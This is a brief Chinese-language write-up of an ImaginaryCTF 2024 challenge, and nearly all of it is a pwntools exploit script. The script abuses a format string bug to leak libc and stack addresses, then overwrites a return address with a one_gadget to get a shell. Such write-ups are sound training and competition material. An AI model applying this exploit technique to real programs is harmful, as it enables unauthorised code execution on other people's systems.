介绍
ImaginaryCTF 2024 is a cybersecurity CTF competition run by ImaginaryCTF with a variety of challenges for all skill levels. It runs from July 20 to July 22, starting and ending at 3 AM GMT+8. For more information, check out last year's challenges from ImaginaryCTF 2023, with over 2000 participants.
前言
下次再来填坑吧,就fmt这个可以写个文章了。让我学到了很多。
经验
让我明白同时也抛弃了fmtstr_payload。自己手搓来实现任意地址写。
思路
利用格式化字符串漏洞实现任意地址写,将返回地址修改为one_gadget这样就可以getshell
exp
def exp():
io.recvuntil(">>")
io.sendline("3")
ind("%9$p")
io.recvuntil(" --> ")
leak_addr = int(io.recv(16),16)
log.info(f'leak_addr = {hex(leak_addr)}')
io.recvuntil(' [y/n]:')
io.sendline("y")
ind("%22$p")
io.recvuntil(" -->")
stack_addr = int(io.recv(16),16)
log.info(f'leak_addr = {hex(stack_addr)}')
io.recvuntil(' [y/n]:')
io.sendline("y")
libc = ELF('./libc.so.6')
libc_base = leak_addr - 275 - libc.sym['_IO_file_overflow']
log.info(f'libc_base = {hex(libc_base)}')
one_gadget = libc_base + 0xe3b01
log.info(f'one_gadget = {hex(one_gadget)}')
stack_1 = stack_addr + 8
payload = "%" + str((stack_1)&0xff) + "c" +"%18$hhn"
ind(payload)
io.recvuntil(' [y/n]:')
io.sendline("y")
sleep(2)
payload = "%" + str((one_gadget)&0xffff) + "c" +"%22$hn"
ind(payload)
io.recvuntil(' [y/n]:')
io.sendline("y")
sleep(2)
payload = "%" + str((stack_1+2)&0xff) + "c" +"%18$hhn"
ind(payload)
io.recvuntil(' [y/n]:')
io.sendline("y")
sleep(2)
payload = "%" + str((one_gadget>>16)&0xff) + "c" +"%22$hhn"
ind(payload)
io.recvuntil(' [y/n]:')
io.sendline("n")
sleep(2)
exp()
io.interactive()